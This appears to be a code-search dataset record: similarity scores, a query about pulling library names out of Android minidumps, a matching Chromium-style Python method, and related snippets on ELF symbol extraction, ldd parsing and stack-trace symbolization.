[ "0.7554683", "0.65706384", "0.6247244", "0.6195482", "0.61567324", "0.61457145", "0.6059669", "0.60321474", "0.60022146", "0.60022146", "0.59460664", "0.5926765", "0.5923688", "0.5919705", "0.58894503", "0.5882842", "0.5870094", "0.5855827", "0.58501244", "0.5832909", "0.58105147", "0.5784442", "0.5758196", "0.5745872", "0.57256746", "0.5721621", "0.5702363", "0.5696622", "0.56915563", "0.56731075", "0.5651484", "0.5638282", "0.56334263", "0.5627127", "0.5625484", "0.56164443", "0.5614456", "0.5605643", "0.5583373", "0.5582826", "0.5565979", "0.5560789", "0.5551487", "0.5551487", "0.5551487", "0.5550011", "0.5528494", "0.55274045", "0.55150753", "0.55102146", "0.551005", "0.5499464", "0.5496176", "0.5486274", "0.54716265", "0.5463271", "0.54554874", "0.54514843", "0.5450105", "0.5439295", "0.5438265", "0.54335934", "0.5432427", "0.5428893", "0.5428698", "0.5427372", "0.5422991", "0.5409529", "0.54088724", "0.53723556", "0.5349384", "0.5343712", "0.5329794", "0.5329489", "0.53281254", "0.53174436", "0.53145176", "0.5295403", "0.5287635", "0.52807266", "0.5275958", "0.52744776", "0.52725327", "0.5272099", "0.52544403", "0.5253917", "0.524593", "0.52415955", "0.52264434", "0.5221577", "0.52205795", "0.52190065", "0.5212709", "0.52122843", "0.52048004", "0.51993966", "0.51973754", "0.51918995", "0.5185401", "0.5182889" ]
0.7863217
0
Extracts library names that may contain symbols from the minidump. This is a duplicate of the logic in Chromium's //build/android/stacktrace/crashpad_stackwalker.py.
def _ExtractLibraryNamesFromDump(self, minidump): default_library_name = 'libmonochrome.so' minidump_dump_output = self._GetMinidumpDumpOutput(minidump) if not minidump_dump_output: logging.warning( 'Could not get minidump_dump output, defaulting to library %s', default_library_name) return [default_library_name] library_names = [] module_library_line_re = re.compile(r'[(]code_file[)]\s+= ' r'"(?P<library_name>lib[^. ]+.so)"') in_module = False for line in minidump_dump_output.splitlines(): line = line.lstrip().rstrip('\n') if line == 'MDRawModule': in_module = True continue if line == '': in_module = False continue if in_module: m = module_library_line_re.match(line) if m: library_names.append(m.group('library_name')) if not library_names: logging.warning( 'Could not find any library name in the dump, ' 'default to: %s', default_library_name) return [default_library_name] return library_names
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def GetSymbolBinaries(self, minidump):\n libraries = self._ExtractLibraryNamesFromDump(minidump)\n symbol_binary_dir = self._GetSymbolBinaryDirectory(minidump, libraries)\n if not symbol_binary_dir:\n return []\n\n return [os.path.join(symbol_binary_dir, lib) for lib in libraries]", "def get_platform_und_symbols():\n ret = None\n if osname_is_freebsd():\n ret = sorted([\"environ\", \"__progname\"])\n if is_verbose():\n print(\"Checking for required UND symbols... \" + str(ret))\n return ret", "def extract_symbols(lib_file, static_lib=None):\n if static_lib is None:\n static_lib = is_static_library(lib_file)\n if sys.platform.startswith('aix'):\n extractor = AIXDumpExtractor(static_lib=static_lib)\n elif ReadElfExtractor.find_tool() and not static_lib:\n extractor = ReadElfExtractor(static_lib=static_lib)\n else:\n extractor = NMExtractor(static_lib=static_lib)\n return extractor.extract(lib_file)", "def _GetSymbolBinaryDirectory(self, minidump, libraries):\n if minidump in self._minidump_symbol_binaries_directories:\n return self._minidump_symbol_binaries_directories[minidump]\n\n # Get the processor architecture reported by the minidump.\n arch = None\n matcher = re.compile(_PROCESSOR_ARCH_REGEX)\n for line in self._GetMinidumpDumpOutput(minidump).splitlines():\n match = matcher.match(line)\n if match:\n arch = match.groupdict()['arch'].lower()\n break\n if not arch:\n logging.error('Unable to find processor architecture for minidump %s',\n minidump)\n self._minidump_symbol_binaries_directories[minidump] = None\n return None\n if arch not in _BREAKPAD_ARCH_TO_FILE_REGEX:\n logging.error(\n 'Unsupported processor architecture %s for minidump %s. This is '\n 'likely fixable by adding the correct mapping for the architecture '\n 'in android_minidump_symbolizer._BREAKPAD_ARCH_TO_FILE_REGEX.',\n arch, minidump)\n self._minidump_symbol_binaries_directories[minidump] = None\n return None\n\n # Look for a directory that contains binaries with the correct architecture.\n matcher = re.compile(_BREAKPAD_ARCH_TO_FILE_REGEX[arch])\n symbol_dir = None\n for symbol_subdir in _POSSIBLE_SYMBOL_BINARY_DIRECTORIES:\n possible_symbol_dir = os.path.join(self._build_dir, symbol_subdir)\n if not os.path.exists(possible_symbol_dir):\n continue\n for f in os.listdir(possible_symbol_dir):\n if f not in libraries:\n continue\n binary_path = os.path.join(possible_symbol_dir, f)\n stdout = subprocess.check_output(\n ['file', binary_path], stderr=subprocess.STDOUT)\n if matcher.match(stdout):\n symbol_dir = possible_symbol_dir\n break\n\n if not symbol_dir:\n logging.error(\n 'Unable to find suitable symbol binary directory for architecture %s.'\n 'This is likely fixable by adding the correct directory to '\n 'android_minidump_symbolizer._POSSIBLE_SYMBOL_BINARY_DIRECTORIES.',\n arch)\n self._minidump_symbol_binaries_directories[minidump] = symbol_dir\n return symbol_dir", "def extract_functions(elf_path):\n text_data = objdump_section(elf_path, '.text')\n name_to_addr = parse_func_names(text_data)\n return name_to_addr", "def __init__(self, dump_finder, build_dir, symbols_dir=None):\n # Map from minidump path (string) to minidump_dump output (string).\n self._minidump_dump_output = {}\n # Map from minidump path (string) to the directory that should be used when\n # looking for symbol binaries (string).\n self._minidump_symbol_binaries_directories = {}\n # We use the OS/arch of the host, not the device.\n super(AndroidMinidumpSymbolizer, self).__init__(\n platform.system().lower(), platform.machine(), dump_finder, 
build_dir,\n symbols_dir=symbols_dir)", "def _ExtractLibraryLoadAddressesFromLogcat(logs):\n browser_libs = LibraryLoadMap()\n renderer_libs = LibraryLoadMap()\n for m in re_library_address.finditer(logs):\n process_type, lib_name, lib_address = m.groups()\n lib_address = int(lib_address, 16)\n if process_type == 'BROWSER':\n browser_libs[lib_name] = lib_address\n elif process_type == 'RENDERER':\n renderer_libs[lib_name] = lib_address\n else:\n assert False, 'Invalid process type'\n\n return browser_libs, renderer_libs", "def get_libraries_names():\n rpm_packages_path = path.join(PMDK_PATH, 'rpm', SYSTEM_ARCHITECTURE)\n libraries_names = [elem.split('-')[0] for elem in listdir(rpm_packages_path)\n if PMDK_VERSION in elem]\n return set(libraries_names)", "def _LoadGlobalSymbolsFromDump(dump_obj):\n symbols = set()\n for key in (\"elf_functions\", \"elf_objects\"):\n symbols.update(\n symbol.get(\"name\", \"\") for symbol in dump_obj.get(key, []) if\n symbol.get(\"binding\", \"global\") == \"global\")\n return symbols", "def get_memory_tool_labels(stacktrace):\n # Remove stack frames and paths to source code files. This helps to avoid\n # confusion when function names or source paths contain a memory tool token.\n data = ''\n for line in stacktrace.split('\\n'):\n if STACKFRAME_LINE_REGEX.match(line):\n continue\n data += line + '\\n'\n\n labels = [t['label'] for t in MEMORY_TOOLS_LABELS if t['token'] in data]\n return labels", "def test_GetSymbolMapping_normalize(self):\n lines = [\"This is a test case\\n\", \"Caching all mojo apps\",\n \"I/mojo(2): [INFO:somefile.cc(85)] Caching mojo app \"\n \"https://apps.mojo/myapp.mojo at /path/to/.//myapp.mojo/.lM03ws\"]\n golden_dict = {\n \"/path/to/myapp.mojo/.lM03ws\": \"libmyapp_library.so\"\n }\n actual_dict = stack_utils.GetSymbolMapping(lines)\n self.assertDictEqual(golden_dict, actual_dict)", "def _GetSymbolNameToFilename(build_directory):\n symbol_extractor.CheckLlvmNmExists()\n path = os.path.join(build_directory, 'obj')\n object_filenames = cyglog_to_orderfile.GetObjectFilenames(path)\n pool = multiprocessing.Pool()\n symbol_names_filename = zip(\n pool.map(symbol_extractor.SymbolNamesFromLlvmBitcodeFile,\n object_filenames),\n object_filenames)\n pool.close()\n result = {}\n for (symbol_names, filename) in symbol_names_filename:\n stripped_filename = filename[len(build_directory):]\n if stripped_filename.startswith('/obj/'):\n stripped_filename = stripped_filename[len('/obj/'):]\n for s in symbol_names:\n result[s] = stripped_filename\n return result", "def get_symbols(doc, lib):\n\n basename = lib.replace(\".dll\", \"\").lower()\n filename = os.path.join(get_hopper_script_dir(), basename + \".txt\")\n if not os.path.exists(filename):\n doc.log(\"Symbol file not found: %s\" % filename)\n return None\n\n symbols = {}\n with open(filename, \"r\") as fp:\n for i, line in enumerate(fp, 1):\n match = symbol_line.match(line)\n if not match:\n doc.log(\"Skipping line %d: Malformed\" % i)\n continue\n\n ordinal, name = match.group(1), match.group(2)\n if ordinal and name:\n symbols[ordinal] = name\n\n return symbols", "def extract(self, lib):\n cmd = [self.nm_exe] + self.flags + [lib]\n out = subprocess.check_output(cmd).decode()\n fmt_syms = (self._extract_sym(l)\n for l in out.splitlines() if l.strip())\n # Cast symbol to string.\n final_syms = (repr(s) for s in fmt_syms if self._want_sym(s))\n # Make unique and sort strings.\n tmp_list = list(sorted(set(final_syms)))\n # Cast string back to symbol.\n return 
util.read_syms_from_list(tmp_list)", "def _DiffElfSymbols(self, dump_obj, parser):\n dump_symbols = self._LoadGlobalSymbolsFromDump(dump_obj)\n lib_symbols = parser.ListGlobalDynamicSymbols(include_weak=True)\n return sorted(dump_symbols.difference(lib_symbols))", "def decode_traceback(traceback_str, in_binfile=\"\", search_dirs=[]):\n print (\"Decoding: \" + traceback_str + \"\\n\")\n tb_str = \"Traceback=\"\n start = traceback_str.find(tb_str)\n if start < 0:\n print (\"Error: Unexpected Traceback string: it must contain '\" + tb_str + \"'\")\n return \"Error: Failed to decode\"\n tokens = traceback_str[(start + len(tb_str)):].split()\n if len(tokens) < 1:\n print (\"Error: Unexpected Traceback string: too short\")\n return \"Error: Failed to decode\"\n # the first token must be the binary that generates the traceback\n binfile = find_binfile(in_binfile, tokens[0], search_dirs)\n verbose(\"The main binary file is: \" + str(binfile), LEVEL_0)\n shlib_db = dict()\n if args.useldd and binfile and os.path.exists(binfile):\n # only if -u command option is specified\n shlib_db = get_all_shlib_paths_via_ldd(binfile)\n verbose(\"The shared library database from ldd is: \" + str(shlib_db), LEVEL_2)\n decode_result = \"\"\n for token in tokens:\n if '+' in token:\n result = get_addr2line(token, binfile, search_dirs, shlib_db)\n verbose(result, LEVEL_0)\n decode_result += result + \"\\n\"\n return decode_result", "def testStacktraceParsing(self, mock_get_dependency):\n mock_get_dependency.return_value = {\n 'chrome': Dependency('chrome', 'https://repo', 'rev1')\n }\n\n uma_data = self._GetDummyUMAData()\n actual_stack_trace = uma_data.stacktrace\n\n stack_frame0 = stacktrace.ProfilerStackFrame(\n 0, 0.1, float('inf'), False, 'chrome', 'wWinMain',\n 'app/chrome_exe_main_win.cc', 'chrome/app/chrome_exe_main_win.cc',\n 'https://repo', 484,\n (stacktrace.FunctionLine(line=490, sample_fraction=0.7),\n stacktrace.FunctionLine(line=511, sample_fraction=0.3)),\n (stacktrace.FunctionLine(line=490, sample_fraction=0.9),\n stacktrace.FunctionLine(line=511, sample_fraction=0.1)))\n stack_frame1 = stacktrace.ProfilerStackFrame(\n 1, 0.2, 6.1, False, 'chrome', 'MainDllLoader::Launch(HINSTANCE__ *)',\n 'app/main_dll_loader_win.cc', 'chrome/app/main_dll_loader_win.cc',\n 'https://repo', 117, None)\n frames0 = (stack_frame0, stack_frame1)\n\n stack_frame2 = stacktrace.ProfilerStackFrame(\n 0, 0.3, float('inf'), False, 'chrome', 'wWinMain',\n 'app/chrome_exe_main_win.cc', 'chrome/app/chrome_exe_main_win.cc',\n 'https://repo', 484, None)\n frames1 = (stack_frame2,)\n\n call_stack0 = stacktrace.CallStack(0, frames0,\n stacktrace.CallStackFormatType.DEFAULT,\n stacktrace.LanguageType.CPP)\n call_stack1 = stacktrace.CallStack(0, frames1,\n stacktrace.CallStackFormatType.DEFAULT,\n stacktrace.LanguageType.CPP)\n stacks = (call_stack0, call_stack1)\n expected_stacktrace = stacktrace.Stacktrace(stacks, call_stack0)\n\n self._VerifyTwoStackFramesEqual(actual_stack_trace.stacks[0].frames[0],\n stack_frame0)\n self._VerifyTwoStacktracesEqual(actual_stack_trace, expected_stacktrace)", "def _getImports_ldd(pth):\n rslt = set()\n if is_aix:\n # Match libs of the form\n # 'archivelib.a(objectmember.so/.o)'\n # or\n # 'sharedlib.so'\n # Will not match the fake lib '/unix'\n lddPattern = re.compile(r\"^\\s*(((?P<libarchive>(.*\\.a))(?P<objectmember>\\(.*\\)))|((?P<libshared>(.*\\.so))))$\")\n elif is_hpux:\n # Match libs of the form\n # 'sharedlib.so => full-path-to-lib\n # e.g.\n # 'libpython2.7.so => 
/usr/local/lib/hpux32/libpython2.7.so'\n lddPattern = re.compile(r\"^\\s+(.*)\\s+=>\\s+(.*)$\")\n elif is_solar:\n # Match libs of the form\n # 'sharedlib.so => full-path-to-lib\n # e.g.\n # 'libpython2.7.so.1.0 => /usr/local/lib/libpython2.7.so.1.0'\n # Will not match the platform specific libs starting with '/platform'\n lddPattern = re.compile(r\"^\\s+(.*)\\s+=>\\s+(.*)$\")\n else:\n lddPattern = re.compile(r\"\\s*(.*?)\\s+=>\\s+(.*?)\\s+\\(.*\\)\")\n\n for line in compat.exec_command('ldd', pth).splitlines():\n m = lddPattern.search(line)\n if m:\n if is_aix:\n libarchive = m.group('libarchive')\n if libarchive:\n # We matched an archive lib with a request for a particular\n # embedded shared object.\n # 'archivelib.a(objectmember.so/.o)'\n lib = libarchive\n name = os.path.basename(lib) + m.group('objectmember')\n else:\n # We matched a stand-alone shared library.\n # 'sharedlib.so'\n lib = m.group('libshared')\n name = os.path.basename(lib)\n elif is_hpux:\n name, lib = m.group(1), m.group(2)\n else:\n name, lib = m.group(1), m.group(2)\n if name[:10] in ('linux-gate', 'linux-vdso'):\n # linux-gate is a fake library which does not exist and\n # should be ignored. See also:\n # http://www.trilithium.com/johan/2005/08/linux-gate/\n continue\n\n if os.path.exists(lib):\n # Add lib if it is not already found.\n if lib not in rslt:\n rslt.add(lib)\n else:\n logger.error('Can not find %s in path %s (needed by %s)',\n name, lib, pth)\n return rslt", "def test_GetSymbolMapping_simple_match(self):\n lines = [\"This is a test case\\n\", \"Caching all mojo apps\",\n \"I/mojo(2): [INFO:somefile.cc(85)] Caching mojo app \"\n \"https://apps.mojo/myapp.mojo at /path/to/myapp.mojo/.lM03ws\"]\n golden_dict = {\n \"/path/to/myapp.mojo/.lM03ws\": \"libmyapp_library.so\"\n }\n actual_dict = stack_utils.GetSymbolMapping(lines)\n self.assertDictEqual(golden_dict, actual_dict)", "def DumpSymbols(lib_path, dump_path):\n elf_parser = ExternalModules.elf_parser\n parser = None\n try:\n parser = elf_parser.ElfParser(lib_path)\n symbols = parser.ListGlobalDynamicSymbols()\n finally:\n if parser:\n parser.Close()\n if not symbols:\n return \"No symbols\"\n symbols.sort()\n with open(dump_path, \"w\") as dump_file:\n dump_file.write(\"\\n\".join(symbols) + \"\\n\")\n return \"Output: \" + dump_path", "def get_dlls(comments):\n dlls = [line for line in comments if '.dll' in line.lower()]\n return list(set(line.split()[-1].lower() for line in dlls))", "def get_symbols(obj_path):\n cmd = ['nm', obj_path]\n res = subprocess.run(cmd, stdout=subprocess.PIPE,\n stderr=subprocess.PIPE, check=True)\n\n return res.stdout.decode()", "def _filter_stack(\n stack: List[traceback.FrameSummary],\n) -> List[traceback.FrameSummary]:\n # strip the task factory frame in the vanilla event loop\n if (\n stack[-1].filename.endswith(\"asyncio/base_events.py\")\n and stack[-1].name == \"create_task\"\n ):\n stack = stack[:-1]\n # strip the loop.create_task frame\n if (\n stack[-1].filename.endswith(\"asyncio/tasks.py\")\n and stack[-1].name == \"create_task\"\n ):\n stack = stack[:-1]\n _cut_idx = 0\n for _cut_idx, f in reversed(list(enumerate(stack))):\n # uvloop\n if f.filename.endswith(\"asyncio/runners.py\") and f.name == \"run\":\n break\n # vanilla\n if f.filename.endswith(\"asyncio/events.py\") and f.name == \"_run\":\n break\n return stack[_cut_idx + 1 :]", "def _extract_r_remove_package_names(log):\n start = \"remove.packages(c(\"\n i_start = log.find(start) + len(start)\n i_end = log.find(\")\", i_start)\n package_names = 
[name.strip('\"') for name in log[i_start:i_end].split(\",\")]\n return package_names", "def test_GetSymbolMapping_multiple_match(self):\n lines = [\"This is a test case\\n\", \"Caching all mojo apps\",\n \"I/mojo(2): [INFO:somefile.cc(85)] Caching mojo app \"\n \"https://apps.mojo/myapp.mojo at /path/to/myapp.mojo/.lM03ws\",\n \"I/mojo(2): [INFO:somefile.cc(85)] Caching mojo app \"\n \"https://apps.mojo/otherapp.mojo at /path/to/otherapp.mojo/.kW07s\"]\n golden_dict = {\n \"/path/to/myapp.mojo/.lM03ws\": \"libmyapp_library.so\",\n \"/path/to/otherapp.mojo/.kW07s\": \"libotherapp_library.so\"\n }\n actual_dict = stack_utils.GetSymbolMapping(lines)\n self.assertDictEqual(golden_dict, actual_dict)", "def extract_function_name(maybe_function_str: str) -> Optional[str]:\n match = STACK_TRACE_LINE_RE.search(maybe_function_str)\n if match is not None:\n return match.group(2)\n return None", "def analyze_source(source, prefix):\n symbolre = re.compile(r\"[\\s:;&\\|\\<\\>\\=\\^\\+\\-\\*/\\(\\)\\?]\" + prefix + \"([a-zA-Z0-9_]+)[\\s\\(]\")\n results = symbolre.findall(source, re.MULTILINE)\n ret = set()\n for ii in results:\n symbolset = set()\n symbolset.add(ii)\n ret = ret.union(symbolset)\n return ret", "def get_search_keywords(testcase):\n crash_state_lines = testcase.crash_state.splitlines()\n # Use top 2 frames for searching.\n return crash_state_lines[:2]", "def fix_mangled_includes(ln):\n m = proginput_re.search(ln)\n if m:\n fn = m.group(1)\n dName = os.path.dirname(fn)\n fName = os.path.basename(fn)\n for fn2 in os.listdir(dName):\n if fn2.replace(\"_\",\"\") == fName:\n ln = \"\\\\programinput{\" + os.path.join(dName,fn2) + \"}\\n\"\n break\n return ln", "def get_paths_containing_string_in_threadstack(target_str, stack_context=2):\n frames = []\n list_of_frames = [\n get_paths_containing_string_in_locals(target_str,\n val.frame.f_locals,\n locals_dict_ref_str=\"[get_paths_containing_string_in_locals(target_str, val.frame.f_locals) for idx, \"\n \"val in enumerate(inspect.getouterframes(inspect.currentframe(), \"\n \"2)) if \\\"pydev\\\" not in val.filename]\")\n for idx, val in enumerate(inspect.getouterframes(inspect.currentframe(), stack_context))\n if \"pydev\" not in val.filename]\n\n for x in list_of_frames:\n for y in x:\n frames.append(y)\n return frames", "def resolve_addresses(trace, progname, depth):\n platform = sys.platform\n for i in trace:\n for stkaddr in i[\"stack\"][-depth:]:\n if stkaddr not in Cheaper.stack_info:\n if platform == \"darwin\":\n result = str(stkaddr) # FIXME symbolication still not working\n if False:\n result = subprocess.run(\n [\"atos\", \"-o\", progname, hex(stkaddr)],\n stdout=subprocess.PIPE,\n )\n else:\n result = subprocess.run(\n [\"addr2line\", hex(stkaddr), \"-C\", \"-e\", progname],\n stdout=subprocess.PIPE,\n )\n if platform == \"darwin\":\n # Using stdout currently disabled\n Cheaper.stack_info[stkaddr] = result\n else:\n Cheaper.stack_info[stkaddr] = result.stdout.decode(\"utf-8\").strip()\n # If it failed to resolve symbols, use the address instead\n if \"?\" in Cheaper.stack_info[stkaddr]:\n Cheaper.stack_info[stkaddr] = \"CHEAPERBAD \" + str(hex(stkaddr))", "def get_name_with_lib(datablock):\r\n text = datablock.name\r\n if datablock.library:\r\n # text += ' (Lib: \"%s\")' % datablock.library.name\r\n text = \"L \" + text\r\n return text", "def fixer_func(dlls):\n if type(dlls) is str:\n return ';'.join(sorted(set(dlls.split(';'))))\n return dlls", "def extract(self, lib):\n cmd = [self.tool] + self.flags + [lib]\n out = 
subprocess.check_output(cmd).decode()\n loader_syms = self.get_loader_symbol_table(out)\n return self.process_syms(loader_syms)", "def getMangledName(self, name, module=None):\n if module is os.path:\n return \"os.path\"\n if isinstance(name, str) and (name.startswith(self.start) or name == self.package):\n return self.prefix + name\n return name", "def extract_symbol_names_from_target(subast) -> list:\n # initialise an empty list of the symbol names\n symbol_names = []\n # walk the target object to look for ast.Name instances\n for walked_ast in ast.walk(subast):\n if type(walked_ast) is ast.Name:\n symbol_names.append(walked_ast.id)\n return symbol_names", "def split_debug(src, objcopy=None, objdump=None):\n if objcopy is None:\n objcopy = \"objcopy\"\n if objdump is None:\n objdump = \"objdump\"\n if not contains_debug_info(src, objdump=objdump):\n ui.info(\"-- Already stripped\", src)\n return\n src_stat = os.stat(src)\n dirname, basename = os.path.split(src)\n debug_dir = os.path.join(dirname, \".debug\")\n qisys.sh.mkdir(debug_dir)\n dest = os.path.join(src, debug_dir, basename)\n to_run = list()\n to_run.append([objcopy, \"--only-keep-debug\", src, dest])\n to_run.append([objcopy,\n \"--strip-debug\",\n \"--strip-unneeded\",\n \"--add-gnu-debuglink=%s\" % dest,\n src])\n try:\n for cmd in to_run:\n qisys.command.check_output(cmd, stderr=subprocess.STDOUT)\n ui.info(\"-- Debug info extracted for\", src)\n except qisys.command.CommandFailedException as e:\n ui.error(\"Error while Extracting package debug for %s\" % src)\n ui.error(str(e))\n # After the commands have run, utime of the file has changed, causing\n # cmake to re-install the libraries. Which is not cool ...\n # So set back mtime to its previous value:\n os.utime(src, (src_stat.st_atime, src_stat.st_mtime))", "def find_backtrace(self):\n return [ft for ft in os.listdir(self.output_dir)\n if os.path.isfile(ft) and ft.startswith(\"Backtrace.\")]", "def get_crash_dumps_path(self):\n\t\treturn call_sdk_function('PrlApi_GetCrashDumpsPath')", "def extract_censored_tb(tb, limit=None):\n # [3:] drops the top frames (which are Halp internals).\n items = traceback.extract_tb(tb, limit)[3:]\n if items and current_line_number:\n # The top item came from a '## ' line; fix its line number:\n filename, lineno, func_name, text = items[0]\n if filename == '<string>' and lineno == 1: # (should always be true)\n items[0] = filename, current_line_number, func_name, None\n return items", "def generate_dependencies(data, mib_name):\r\n if mib_name not in mib_dependency_map:\r\n mib_dependency_map[mib_name] = []\r\n imports_section_search = re.search('IMPORTS(?P<imports_section>.*?);', data, re.DOTALL)\r\n if imports_section_search:\r\n imports_section = imports_section_search.group('imports_section')\r\n for dependency in re.finditer('FROM (?P<mib_name>[\\w-]+)', imports_section):\r\n dependency_name = dependency.group('mib_name')\r\n if dependency_name not in mib_dependency_map:\r\n mib_dependency_map[dependency_name] = []\r\n mib_dependency_map[mib_name].append(dependency_name)", "def DumpStackTracebacks():\n results = []\n id_name_map = {}\n for thread in threading.enumerate():\n id_name_map[thread.ident] = thread.name\n\n results.append(\n '*****\\n'\n '*\\n'\n '* Dumping debug information.\\n'\n '*\\n'\n '*****\\n')\n # pylint: disable=protected-access\n for thread_id, stack in sys._current_frames().items():\n results.append('Thread %s (id=%d):\\n' %\n (id_name_map.get(thread_id, 'unnamed-%d' % thread_id),\n thread_id))\n for filename, 
line_no, function_name, text in (\n traceback.extract_stack(stack)):\n # Same format as the usual Python stack trace, but indented\n # twice\n results.append(' File: \"%s\", line %d, in %s\\n' % (\n filename, line_no, function_name))\n if text:\n results.append(' %s\\n' % text.strip())\n\n results.append('***** End of debug information.\\n')\n\n return ''.join(results)", "def extract(self, lib):\n cmd = [self.tool] + self.flags + [lib]\n out = subprocess.check_output(cmd).decode()\n dyn_syms = self.get_dynsym_table(out)\n return self.process_syms(dyn_syms)", "def xspace_to_tool_names(xspace_paths):\n raw_data, success = _pywrap_profiler.xspace_to_tools_data(\n xspace_paths, 'tool_names')\n if success:\n return [tool + '^' for tool in raw_data.decode().split(',')]\n return []", "def find_link_references(bytecode, full_reference_names):\n unprefixed_bytecode = remove_0x_prefix(bytecode)\n\n expand_fn = functools.partial(\n expand_shortened_reference_name,\n full_reference_names=full_reference_names,\n )\n\n link_references = tuple((\n LinkReference(\n reference_name=remove_dunderscore_wrapper(match.group()),\n full_name=expand_fn(remove_dunderscore_wrapper(match.group())),\n offset=match.start(),\n length=match.end() - match.start(),\n ) for match in re.finditer(DEPENDENCY_RE, unprefixed_bytecode)\n ))\n\n return link_references", "def extractStack(frame, context=10, exceptionsFrameSymbol=EXCEPTIONS_FRAME_SYMBOL):\n\n\tstack = []\n\n\tfor frame, fileName, lineNumber, name, context, index in inspect.getouterframes(frame, context):\n\t\tif frame.f_locals.get(exceptionsFrameSymbol):\n\t\t\tcontinue\n\n\t\tstack.append((frame,\n\t\t\t\t\tfileName,\n\t\t\t\t\tlineNumber,\n\t\t\t\t\tname, context\n\t\t\t\t\tif context is not None else [],\n\t\t\t\t\tindex if index is not None else -1))\n\n\treturn list(reversed(stack))", "def format_backtrace(trace):\n backtrace = []\n for filename, line, func, _ in traceback.extract_tb(trace):\n desc = {'file': filename,\n 'line': line,\n 'function': func,\n 'text': _}\n backtrace.append(desc)\n return backtrace", "def extract_gcc_binaries():\n patterns = [\n \"/opt/local/bin/g++-mp-[0-9]*.[0-9]*\",\n \"/opt/local/bin/g++-mp-[0-9]*\",\n \"/usr/local/bin/g++-[0-9]*.[0-9]*\",\n \"/usr/local/bin/g++-[0-9]*\",\n ]\n if platform.system() == \"Darwin\":\n gcc_binaries = []\n for pattern in patterns:\n gcc_binaries += glob.glob(pattern)\n gcc_binaries.sort()\n if gcc_binaries:\n _, gcc = os.path.split(gcc_binaries[-1])\n return gcc\n else:\n return None\n else:\n return None", "def get_binary_name():\n return os.path.basename(inspect.stack()[-1][1])[:16]", "def get_keyword(package):\n\ttry:\n\t\tsubstr = re.search(r'(\\S+)_(\\S+)', package)\n\t\tif substr:\n\t\t\treturn substr.groups()\n\texcept Exception,e:\n\t\tlog.error(str(e))\n\t\treturn None", "def libraries(self):\n\n status, stdout, stderr = self.__xcall__(['--libs-only-l'])\n\n if status != 0:\n raise RuntimeError(\"error querying --libs-only-l for package `%s': %s\" % (self.name, stderr))\n\n retval = []\n for token in stdout.split():\n retval.append(token[2:])\n\n return uniq(retval)", "def extract_stack_trace_logs(\n self, log_lines: List[str], application: str\n ) -> List[str]:\n\n # Search for the known crash/stack file marker\n LOG.debug(f\"Extracting crash stack traces from {application} log\")\n for idx, log in enumerate(log_lines):\n # This marker is only present in non-VPP application logs. 
VPP has its own CrashAnalyzer.\n if STACK_TRACE_CONTENT_MARKER in log:\n # Strip away whitespace markers inserted for multi-line logs\n stack_lines = [line.lstrip() for line in log_lines[idx].splitlines()]\n LOG.info(\n f\"Found stack trace in {application} log with {len(stack_lines)} lines\"\n )\n return stack_lines\n\n return []", "def _ScanLibDirs(self, dump_zip, dump_paths, lib_dirs, dump_version):\n error_list = []\n lib_paths = dict()\n for lib_dir in lib_dirs:\n for parent_dir, dir_names, lib_names in os.walk(lib_dir):\n for lib_name in lib_names:\n if lib_name not in lib_paths:\n lib_paths[lib_name] = os.path.join(parent_dir,\n lib_name)\n for lib_name, dump_path in dump_paths.items():\n if lib_name not in lib_paths:\n logging.info(\"%s: Not found on target\", lib_name)\n continue\n lib_path = lib_paths[lib_name]\n rel_path = os.path.relpath(lib_path, self._temp_dir)\n\n has_exception = False\n missing_symbols = []\n vtable_diff = []\n\n try:\n with dump_zip.open(dump_path, \"r\") as dump_file:\n dump_obj = json.load(dump_file)\n with vtable_dumper.VtableDumper(lib_path) as dumper:\n missing_symbols = self._DiffElfSymbols(\n dump_obj, dumper)\n vtable_diff = self._DiffVtableComponents(\n dump_obj, dumper)\n except (IOError,\n elf_parser.ElfError,\n vtable_dumper.VtableError) as e:\n logging.exception(\"%s: Cannot diff ABI\", rel_path)\n has_exception = True\n\n if missing_symbols:\n logging.error(\"%s: Missing Symbols:\\n%s\",\n rel_path, \"\\n\".join(missing_symbols))\n if vtable_diff:\n logging.error(\"%s: Vtable Difference:\\n\"\n \"vtable offset expected actual\\n%s\",\n rel_path,\n \"\\n\".join(\" \".join(e) for e in vtable_diff))\n if (has_exception or missing_symbols or vtable_diff):\n error_list.append(rel_path)\n else:\n logging.info(\"%s: Pass\", rel_path)\n return error_list", "def parse_symbol_table(data, sections, elf_header):\n if is64bit(elf_header):\n symbol_entry_str = symbol_64_entry_str\n symbol_entry_spec = symbol_64_entry_spec\n else:\n symbol_entry_str = symbol_32_entry_str\n symbol_entry_spec = symbol_32_entry_spec\n entry_len = struct.calcsize(symbol_entry_str)\n \n st_offset = None\n if \".symtab\" in sections:\n section = \".symtab\"\n if \".strtab\" in sections:\n st_offset = sections[\".strtab\"][\"offset\"]\n else:\n st_offset = sections[section][\"offset\"]\n \n elif \".dynsym\" in sections:\n section = \".dynsym\"\n if \".dynstr\" in sections:\n st_offset = sections[\".dynstr\"][\"offset\"]\n else:\n st_offset = sections[section][\"offset\"]\n \n \n if section not in sections:\n return {}, {} \n \n symbols = {}\n imports = {}\n offset = sections[section][\"offset\"]\n size = sections[section][\"size\"]\n index = offset\n while index < offset + size:\n vals = {}\n if len(data) < index+entry_len: \n break\n \n val_data = struct.unpack(symbol_entry_str, data[index:index+entry_len])\n for i, elem in enumerate(symbol_entry_spec):\n vals[elem[0]] = val_data[i]\n \n if st_offset is None:\n symbols[vals[\"name\"]] = vals\n else:\n func_name = get_name_from_string_table(data, st_offset, vals[\"name\"])\n if func_name:\n vals.pop(\"name\")\n vals[\"info\"] = get_symbol_info(vals[\"info\"])\n vals[\"shndx\"] = get_symbol_shndx(vals[\"shndx\"])\n \n if vals[\"info\"] == \"UNDEFINED\" and vals[\"value\"] == 0:\n tmp_name = func_name\n import_name = \"Unknown\"\n if \"@@\" in func_name:\n i = tmp_name.find(\"@@\")\n func_name = tmp_name[:i]\n import_name = tmp_name[i:].strip(\"@@\") \n if import_name not in imports:\n imports[import_name] = {}\n 
